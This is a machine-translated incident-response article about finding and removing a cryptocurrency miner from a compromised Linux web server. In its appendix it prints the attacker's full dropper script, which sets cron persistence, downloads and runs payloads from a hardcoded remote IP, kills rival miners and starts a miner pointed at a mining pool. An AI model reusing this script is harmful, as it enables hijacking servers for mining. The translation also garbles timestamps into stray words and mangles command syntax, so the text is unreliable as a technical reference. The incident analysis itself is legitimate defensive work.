Shulou(Shulou.com)05/31 Report--

Most people don't quite understand the knowledge points of this article "what is the cpu repair method of Linux system?", so the editor summarizes the following content, detailed content, clear steps, and has a certain reference value. I hope you can gain something after reading this article. Let's take a look at this article "what is the 100% repair method of Linux system cpu?"

Case background:

Linux host CPU% for three consecutive days

How to deal with it:

1. Log in to the server to check the log of those three days in / var/log/messages+/var/log/messages.1+/var/log/messages.3.

2. There is no useful information in dmesg.

3. At this point, it is suspected that he has been attacked. It is natural to look at the bandwidth usage at the corresponding point in time. After checking, it is found that everything is normal. Continue to check.

4. It is suspected that there is an exception in a certain program. First of all, the web process is checked. The abnormal phenomenon is found through the erorr_log of httpd. The httpd program has been modified, and the script executed is the shell script in the appendix.

2014-09-0319 KB/s 1950 (124)-"plm" saved [26587 hand 26587]

FINISHED--2014-09-03 1914 Rose 1950 Murray-

Downloaded:1 files, 26K in 0.2s (124KB/s)

+ perlplm

+ rm-rfplm

+ chmod+x apache

+ chmod+x apache-ssl

+ + ps x

+ + grep-v grep

+ + awk' {print $1}'

+ + grep stratum

+ kill-9

Kill:usage: kill [- s sigspec |-n signum |-sigspec] pid | jobspec. Or kill-l [sigspec]

+ killall-9 kav M32 M64 apache apache-ssl

Kav: noprocess killed

M32: noprocess killed

M64: noprocess killed

Apache:no process killed

Apache-ssl:no process killed

+ PATH=.

+ apache-c httpd.conf

A.sh:./apache: / lib/ld-linux.so.2: bad ELF interpreter: No such file or directory

[root@iZ23vqwi2k5Z~] # + PATH=.

+ apache-ssl-c httpd.conf

[2014-09-0319 1915] Starting Stratum on stratum+tcp://80.240.137.183:3333/

[2014-09-0319 1950] 2 miner threads started, using 'scrypt' algorithm.

[2014-09-0319 1915] Binding thread 0 to cpu 0

[2014-09-0319 Binding thread 1915] to cpu 1

[2014-09-0319 1951] Stratum detected new block

[2014-09-0319 Suzhou 2002] Stratum detected new block

[2014-09-03 19:22:53] Stratum detected new block

5. On Aliyun's test machine, by running this script, during the test run, the content of the cpu lasting 100% error_log on httpd is basically the same as that on the client machine (it seems that the hacker whose basic skills have not been done well, his ass has not been wiped clean) has completely located the problem, and it is suspected that the server web program has been modified to do bad things (suspected mining)

6. the idea of clearing the abnormal process, and make a rough guess according to the content of the script.

(1) the first thing that comes to mind is to delete the exception directory file

# rm-rf / dev/shm/* (delete)

(2) ps to the specific process kill

# Ps aux | grep apche

# root 1615 199 0.1 314992 4200 pts/0 Sl 19:19 37:38 apache-ssl-chttpd.conf

# pkill-9 apache

# ps aux | grep apache | awk'{print $2}'| xargs kill-9 (delete malicious process)

(3) after the execution of the above operation, it is found that the abnormal directory file is generated again, and the apache-ssl process starts again. Check the script for the operation on cron, empty the cron, and execute the action above again.

# crontab-l

* / dev/shm/update > / dev/null 2 > & 1

(4) try to restart the httpd process and find it failed. Check the log is the exception of the configuration file. Check the backup file of bak in httpd.conf. Conscience hacker, do not forget to back up the file to the customer first.

# pwd

/ alidata/server/httpd/conf

# cp httpd.conf.bak httpd.conf

# / etc/init.d/httpd start (this step resumes the httpd process)

7. Appendix the shell content of malicious users

#! / bin/sh

Crontab-r

Cd/dev/shm

Rm-rf astatc * update*

Pwd > mech.dir

Dir=$ (catmech.dir)

Echo "* $dir/update > / dev/null 2 > & 1" > cron.d

Crontabcron.d

Crontab-l | grep update

Wget 173.255.212.191/update > > / dev/null & &

Curl-O http://173.255.212.191/update > > / dev/null & &

Chmod u+xupdate

# chattr-ia bash

# chattr-ia *

Curl-O http://173.255.212.191/apache

Curl-O http://173.255.212.191/apache-ssl

Crul-O http://173.255.212.191/httpd.conf

Wget173.255.212.191/httpd.conf

Wget http://173.255.212.191/apache

Wget http://173.255.212.191/apache-ssl

Wget wget http://173.255.212.191/plm

Perl plm

Rm-rfplm*

Chmod + xapache

Chmod + xapache-ssl

# kill-9`ps x | grep miner | grep-v grep | awk'{print $1}'`

Kill-9`ps x | grep stratum | grep-v grep | awk'{print $1}'`

Killall-9 kav m32 m64 apache apache-ssl

PATH= "." apache-c httpd.conf &

PATH= "." apache-ssl-c httpd.conf &

# chattr+ia bash

# chattr + ia sh

The above is the content of this article on "what is the 100% repair method of cpu in Linux system". I believe you all have a certain understanding. I hope the content shared by the editor will be helpful to you. If you want to know more about the relevant knowledge, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.